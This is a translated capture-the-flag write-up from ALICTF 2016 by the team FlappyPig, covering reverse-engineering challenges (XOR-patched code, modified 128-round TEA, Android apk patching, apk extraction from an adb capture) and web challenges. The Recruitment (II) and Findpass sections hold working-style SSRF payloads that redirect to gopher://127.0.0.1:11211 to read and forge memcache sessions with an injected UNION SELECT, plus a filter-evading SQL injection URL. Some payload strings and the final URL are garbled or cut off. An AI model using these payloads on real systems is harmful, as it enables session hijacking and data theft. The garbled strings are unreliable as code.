ALICTF2016 FlappyPig WriteUp (walkthrough by the winning team FlappyPig) (2)

9. uglycode

The address of the called function is computed as shown below; since a1 = 2, the jump target can be worked out by hand.

Several code regions in the program are XOR-encrypted and have to be decrypted before analysis; the following IDA script patches them in place:

```python
from idaapi import *

def decrypt(start, end, xor_data):
    # XOR every byte in [start, end) with the region's key and patch it in the IDB
    for i in range(start, end):
        a = get_byte(i)
        patch_byte(i, a ^ xor_data)

# three encrypted regions, each with its own single-byte XOR key
decrypt(0x603440, 0x603440 + 250, 0x49)
decrypt(0x603740, 0x603740 + 672, 0x7e)
decrypt(0x603a00, 0x603a00 + 0x1fd, 0xef)
```

The last four characters of the flag body are uncertain, so they are brute-forced against its MD5 hash:

```python
import hashlib
from itertools import product

# MD5 of the complete flag body, taken from the binary
f = '35faf651b1a72022e8ddfed1caf7c45f'

def md5(src):
    m2 = hashlib.md5()
    m2.update(src.encode())
    return m2.hexdigest()

# the four unknown characters sit between the known prefix 'M' and the known tail;
# try every printable ASCII combination (0x20..0x7f)
for i1, i2, i3, i4 in product(range(0x20, 0x80), repeat=4):
    f2 = 'M' + chr(i1) + chr(i2) + chr(i3) + chr(i4) + 'a1w4ys_h3re'
    if md5(f2) == f:
        print(f2)
        break
```

Flag: alictf{Pr0bl3M_1s_A1w4ys_H3re}

10. debug

The binary uses dual-process protection. Look at the parent process first; it is relatively simple.

When the child process stops, the parent modifies its memory.

After the program is patched by hand, the child process can be debugged.

Analysing the algorithm shows that a TEA encryption is performed, the result is XORed with 0x31, and then compared with a fixed string.

The TEA here differs from standard TEA mainly in the number of rounds, which goes from 32 to 128. A decryption program is obtained by slightly modifying standard TEA decryption.

```python
# read the 16-byte comparison string from the binary and undo the XOR 0x31
f = open('./debug', 'rb')
d = f.read()[0x7030:0x7030 + 0x10]
d2 = bytes(b ^ 0x31 for b in d)
print(d2.hex())   # the original script printed this with zio's HEX()
# 5dff17ed14f787e92842a1dc0a97f732
```

```c
#include <stdio.h>
#include <stdint.h>

/* TEA decryption, modified to 128 rounds instead of the standard 32.
   The initial sum is therefore delta * 128 mod 2^32 = 0x1bbcdc80
   (the standard 32-round value would be 0xC6EF3720). */
void decrypt(uint32_t *v, uint32_t *k) {
    uint32_t y = v[0], z = v[1], sum = 0x1bbcdc80, i;      /* set up */
    uint32_t delta = 0x9e3779b9;                           /* a key schedule constant */
    uint32_t a = k[0], b = k[1], c = k[2], d = k[3];       /* cache key */
    for (i = 0; i < 128; i++) {                            /* basic cycle start */
        z -= ((y << 4) + c) ^ (y + sum) ^ ((y >> 5) + d);
        y -= ((z << 4) + a) ^ (z + sum) ^ ((z >> 5) + b);
        sum -= delta;                                      /* end cycle */
    }
    v[0] = y;
    v[1] = z;
}

int main(void) {
    /* PLACEHOLDER: the real key is recovered from the binary and is not given in the writeup */
    uint32_t key[4] = {0, 0, 0, 0};

    /* the two 8-byte halves of 5dff17ed14f787e92842a1dc0a97f732 as little-endian words */
    uint32_t plain2[2] = {0xed17ff5d, 0xe987f714};
    decrypt(plain2, key);
    printf("%08x%08x", plain2[0], plain2[1]);

    uint32_t plain3[2] = {0xdca14228, 0x32f7970a};
    decrypt(plain3, key);
    printf("%08x%08x\n", plain3[0], plain3[1]);
    return 0;
}
```

Flag: c6bf3d7cdad82ea712cea62cccbafddf
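As an added example (not from the writeup), the same pipeline in Python with the round count as a parameter, so it is easy to see why the decryption start value must change from 0xC6EF3720 to 0x1bbcdc80 when the rounds go from 32 to 128. The key is constructed, since the real one lives only in the binary.

```python
import struct

MASK = 0xffffffff
DELTA = 0x9e3779b9

def _mix(x, s, ka, kb):
    # one TEA Feistel term, truncated to 32 bits like the C reference
    return ((((x << 4) & MASK) + ka) ^ ((x + s) & MASK) ^ ((x >> 5) + kb)) & MASK

def tea_encrypt(v, k, rounds=32):
    y, z, s = v[0], v[1], 0
    for _ in range(rounds):
        s = (s + DELTA) & MASK
        y = (y + _mix(z, s, k[0], k[1])) & MASK
        z = (z + _mix(y, s, k[2], k[3])) & MASK
    return [y, z]

def tea_decrypt(v, k, rounds=32):
    # start sum = rounds * delta mod 2^32: 0xC6EF3720 for standard 32 rounds,
    # 0x1bbcdc80 for this challenge's 128-round variant
    y, z, s = v[0], v[1], (DELTA * rounds) & MASK
    for _ in range(rounds):
        z = (z - _mix(y, s, k[2], k[3])) & MASK
        y = (y - _mix(z, s, k[0], k[1])) & MASK
        s = (s - DELTA) & MASK
    return [y, z]

def recover(blob16, key, rounds=128):
    """Undo the binary's pipeline on the 16 bytes read at 0x7030: XOR each
    byte with 0x31, TEA-decrypt both 8-byte blocks (little-endian words) and
    format the result as %08x%08x, as the C program prints it."""
    data = bytes(b ^ 0x31 for b in blob16)
    out = ""
    for off in (0, 8):
        y, z = tea_decrypt(list(struct.unpack("<2I", data[off:off + 8])), key, rounds)
        out += "%08x%08x" % (y, z)
    return out

def forge(plain_hex, key, rounds=128):
    """Constructed inverse of recover(), only used to build test input:
    TEA-encrypt the hex words, then XOR with 0x31 as the binary does."""
    blob = b""
    for i in range(0, 32, 16):
        y, z = int(plain_hex[i:i + 8], 16), int(plain_hex[i + 8:i + 16], 16)
        blob += struct.pack("<2I", *tea_encrypt([y, z], key, rounds))
    return bytes(b ^ 0x31 for b in blob)

# constructed key; the real key is inside the binary and is not in the writeup
DEMO_KEY = [0x01234567, 0x89abcdef, 0xfedcba98, 0x76543210]
```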

11. timer

The native lib in this challenge does not seem to contain anything of interest. Calling the stringFromJNI2 function with the correct number prints the flag, and cracking the lib directly has a low success rate, so the focus is on finding the correct number.

The main logic is as follows:

A brief look shows that the above code runs no more than once per second, and this.beg sets a timeout of 200000 seconds.

That is to say, as long as the application runs continuously for 200000 seconds, the flag may appear...

Of course, running it directly would most likely cost the points. Analysing the above logic gives the following python code.

The is_prime code is copied directly from the apk and adapted. The final result is k = 1616384, which is passed to stringFromJNI2.

To pass the parameter, hooking is the first option to consider. However, since no suitable phone was available at the time, the approach was switched to modifying the smali code directly and repackaging the apk to run.

Open the apk with Android Killer. First, modify MainActivity.smali so that the default value of k is 1616384.

Then modify MainActivity$1.smali in two places: the first change alters the check so that the program directly executes stringFromJNI, and the second comments out the time update so that the code runs only once.

Finally, install the apk and run it. I changed the background to white, otherwise I could not see it clearly.

12. LoopAndLoop

The main logic of this challenge is as follows; entering the correct number yields the flag.

Look at the check function in lib; its main logic is as follows. The check function in lib cyclically calls the check1, check2 and check3 functions in the Java layer. Note that the _JNIEnv::CallIntMethod actually called here has five parameters, and IDA does not list them all (only three are shown): the 4th parameter is the 1st parameter passed into the check function, and the 5th parameter is the 2nd parameter passed into the check function minus 1 (not the parameter itself!!)

The check functions in the Java layer are simple cyclic additions and subtractions; translated into python:

The final output is the correct number 236492408 (I know that the arithmetic series could be summed directly, but I am lazy). Enter it in the apk to get the flag.

13. Steady

This is a pure native apk application; for the relevant background, refer to:

http://www.cnblogs.com/hicjiajia/archive/2011/01/20/1940022.html

This challenge is obfuscated with OLLVM, recognisable from its characteristic while loop and keyword pattern.

The challenge is essentially a game: while the apk is running it reads the phone's orientation angles, and whenever the angle changes it prints the corresponding result to the adb log and changes the screen colour; if the angle is correct, the screen turns green.

Studying the code shows that a_process is passed the three screen angles and that its return value is compared with another array; the key code is shown in the following three figures.

Since the three angles are the only input variables, and the return value of a_process is the only value affected by the angle, the input can be forged by modifying the return value of a_process. Changing the return value of a_process to the values in the array, in sequence, runs the flag code.

However, the flag output is garbled, for another reason.

Studying a_process shows that the maximum value it can return is 6, while 7 and 9 appear in the array.

Further study of the code shows that the result of b_process is added to the result of a_process.

It is also found that b_process is executed only when a_process returns 6, as shown in the figure.

So for the entries that need 7 and 9, the return value of a_process is set to 6 and the return values of b_process to 1 and 3 respectively. The flag finally obtained is alictf{PvrNa7iv3Ap6}

14. ColorOverFlow

A traffic capture is given; extract the apk from it:

```python
#!/usr/bin/env python3
from scapy.all import rdpcap, IP, TCP, Raw
import io
import struct
import sys

b = io.BytesIO()
rawpcap = rdpcap(sys.argv[1])
# keep only host -> device adb traffic (TCP port 5555) that carries a payload
rawpcap = [_ for _ in rawpcap
           if TCP in _ and _[TCP].dport == 5555 and _[IP].src == "10.0.2.2" and Raw in _]
# start right after the adb sync SEND for /data/local/tmp ...
rawpcap = next(rawpcap[i + 1:] for i, p in enumerate(rawpcap)
               if p[Raw].load.find(b'/data/local/tmp') != -1 and p[Raw].load.find(b'SEND') != -1)
# ... and stop at the pm install shell command that follows the upload
rawpcap = next(rawpcap[:i] for i, p in enumerate(rawpcap)
               if p[Raw].load.find(b"pm 'install'") != -1)
print(len(rawpcap))

for p in rawpcap:
    data = p[Raw].load
    if data.startswith(b'WRTE'):   # adb transport message: 24-byte header, then payload
        data = data[24:]
    b.write(data)
b.seek(0)

# the reassembled stream is the adb sync protocol: 8-byte chunk headers
# ('DATA', length) followed by file data, until a non-DATA chunk ('DONE')
a = open('out.apk', 'wb')
header = b.read(8)
while header != b"":
    tag, datalen = struct.unpack('<4si', header)
    if tag == b"DATA":
        a.write(b.read(datalen))
    else:
        break
    header = b.read(8)
a.close()
```

The inverse of the algorithm (AES with an MD5-derived key and a timestamp-masked IV) is written as a Python script to recover the content:

```python
import hashlib
from Crypto.Cipher import AES

def hex2bytes(s):
    # hex string -> list of byte values
    return list(bytes.fromhex(s))

def fix(a, b):
    # XOR the IV bytes with the 8-byte big-endian encoding of the timestamp b,
    # repeating the 8 timestamp bytes across the 16 IV bytes (mirrors the apk's Java code)
    v8 = 8
    v3 = [0] * v8
    for v1 in range(0, v8):
        v3[7 - v1] = 255 & b
        b = b >> v8
    v2 = [0] * len(a)
    v0 = 0
    while v0 < len(a):
        v2[v0] = a[v0] ^ v3[v0 % 8]
        v0 += 1
    return v2

def pre(arg6):
    # hex string -> list of byte values, two characters at a time
    a = []
    for i in range(0, len(arg6), 2):
        a.append(int(arg6[i] + arg6[i + 1], 16))
    return a

def showlist(a):
    # print the bytes as Java signed bytes, for comparison with the apk's debug output
    print(" ".join(str(i - 256 if i >= 128 else i) for i in a))

androidId = "bb39b07060deabd5"
timestamp = 1463149196345
# IV hex as printed in the writeup (a 16-byte AES IV needs exactly 32 hex digits)
iv = fix(hex2bytes("201714bf9f2b3cd3bf580b7cd9bae4514"), timestamp)
showlist(iv)
encryptedData = hex2bytes("DA2990BF15B7FD98A4E73EF766CD714F6F63B2E7F270C55F0CAF7E704CA7702F")
showlist(encryptedData)
# key = MD5(androidId) as hex, taken two hex digits per byte
temp = hashlib.md5(androidId.encode()).hexdigest()
key = pre(temp)
showlist(key)

obj = AES.new(bytes(key), AES.MODE_CBC, bytes(iv))
print(obj.decrypt(bytes(encryptedData)))
```

15. Recruitment (II)

There are many articles on Wooyun about this:

http://drops.wooyun.org/tips/16357

http://drops.wooyun.org/papers/13948

http://drops.wooyun.org/papers/8261

First, set up an environment on a VPS to test the SSRF. The vulnerable spot is where the photo URL is submitted; the suffix is checked and an error is returned otherwise, so the Apache configuration is modified so that files with the jpg suffix are also executed as PHP:

Then just add a jpg file, xxxxx.jpg, and test it by submitting its URL:

The test is successful.

Getting a reverse shell failed and probing various intranet protocols failed, but a memcache instance was found running on local port 11211, restricted to local access; this was confirmed during testing.

After accessing memcache through the SSRF, the response is echoed into the image on index.php; download the image to view it.

The version command returns the version information: VERSION 1.4.14 (Ubuntu)

Use stats items to get the items, which have four IDs:

Then the content has to be retrieved:

Then:

```php
<?php
header('Location: gopher://127.0.0.1:11211/_get%20123123.lock%0aget % percent % 0 aget % percent % 0 aget % percent % 0 aget % percent % 0 aget%20b27dfchc0lbkvdhv6s4qutt1t6%0aget % percent % 0 aget % percent.lock%0aget%20hos82c41uh5c5vcbsoorv7cv47.lock%0aget%20e6lbcsnd1jqlkcdlpksdqa5653.lock%0aget%20tv2b4vad0ea9itqkk3h5a35lg2.lock%0aget % percent % 0 aget % percent % 0 aget % percent % 0 aget % percent % 0 aget % percent % 0 aget%20hos82c41uh5c5vcbsoorv7cv47%0aget % percent % 0 aquit%0a');
?>
```

The session is found here. Using the set command, is_admin is changed to 1, and it is then possible to log in as admin.

Command sequence to be executed:

Generate the jpg:

Log in to /admin and find memo. Modify the ip address in the session to 127.0.0.1 and send an http request through gopher to access memo.php, but it still reports a non-local user. This time backup.php is found, and the source code of the entire site can be accessed. Reviewing the backup files, downloads and the WAF shows that they are strictly filtered, but the session is not, so the session can be modified through ssrf + memcache.

Use union select injection: testing shows 7 columns. Construct the payload, modify the session, access index.php, and obtain the flag (the table name is provided in the source code):

```php
<?php
header('Location: gopher://127.0.0.1:11211/_set % lifecycle %200%200%20177%0d%0agtserver|i:1;captcha_id|s:11:"captcha_110";is_login|b:1;is_admin|b:1;user_ip|s:14:"218.29.102.114";username|s:61:"dfah\'%20union%20select%201,content,7%20from%20memo%20where%20\'1\'=\'1";%0d%0aquit%0d%0a');
?>
```
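As an added example (not from the writeup), a small Python checker a defender could run over submitted photo URLs or proxy logs: it decodes a gopher:// URL into the bytes an SSRF client would send, splits them into memcached text-protocol commands, and flags the state-changing verbs that turn a session read into a session forgery like the one above. The sample URL and session key are constructed.

```python
from urllib.parse import unquote_to_bytes, urlsplit

# memcached text-protocol verbs that change server state
WRITE_VERBS = {b"set", b"add", b"replace", b"append", b"prepend", b"cas",
               b"incr", b"decr", b"delete", b"touch", b"flush_all"}
# verbs followed by a data line (that line is payload, not a command)
DATA_VERBS = {b"set", b"add", b"replace", b"append", b"prepend", b"cas"}

def gopher_selector_bytes(url):
    """Return (host, port, raw bytes) a gopher:// URL makes the fetcher send.
    The path is '/<item type><selector>'; only the selector goes on the wire,
    which is why the writeup's payloads start with '/_'."""
    parts = urlsplit(url)
    if parts.scheme.lower() != "gopher":
        return None, None, b""
    selector = parts.path[2:] if len(parts.path) >= 2 else ""
    raw = unquote_to_bytes(selector)
    if parts.query:                       # '?' is not special in gopher
        raw += b"?" + unquote_to_bytes(parts.query)
    return parts.hostname, parts.port, raw

def memcached_commands(raw):
    """Split wire bytes into (verb, line, is_write) tuples; %0d%0a and %0a
    both end a command, and the data line after set/add/... is tagged data."""
    cmds, expect_data = [], False
    for line in raw.replace(b"\r\n", b"\n").split(b"\n"):
        line = line.strip()
        if not line:
            continue
        if expect_data:
            cmds.append((b"<data>", line, False))
            expect_data = False
            continue
        verb = line.split(b" ", 1)[0].lower()
        cmds.append((verb, line, verb in WRITE_VERBS))
        expect_data = verb in DATA_VERBS
    return cmds

def classify_url(url):
    """Summarise what a submitted 'photo URL' would do if fetched server-side."""
    host, port, raw = gopher_selector_bytes(url)
    cmds = memcached_commands(raw) if raw else []
    return {"host": host, "port": port,
            "commands": [l for _, l, _ in cmds],
            "writes": [l for _, l, w in cmds if w]}
```

A plain image URL yields no commands, so anything with a non-empty "writes" list aimed at port 11211 on a loopback or private host is the case to alert on.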

16. Findpass

After registering an account, a message board is found.

Then I tried XSS in the user name.

The cookie was received early in the morning.

A wave of ideas.

Then we found that HHHH can overwrite the registration.

http://maid:4458/detail.php?user_name=HHHH

user_name is injectable; construct the payload following the xss.

Payload:

http://maid:4458/detail.php?user_name=HHHH%27%0aununionion%0aselselectect%0auser_pass,4%,4%0afrfromom%0atest.users%0aununionion%0aselselectect%0a1,271,0aoorr%0a%
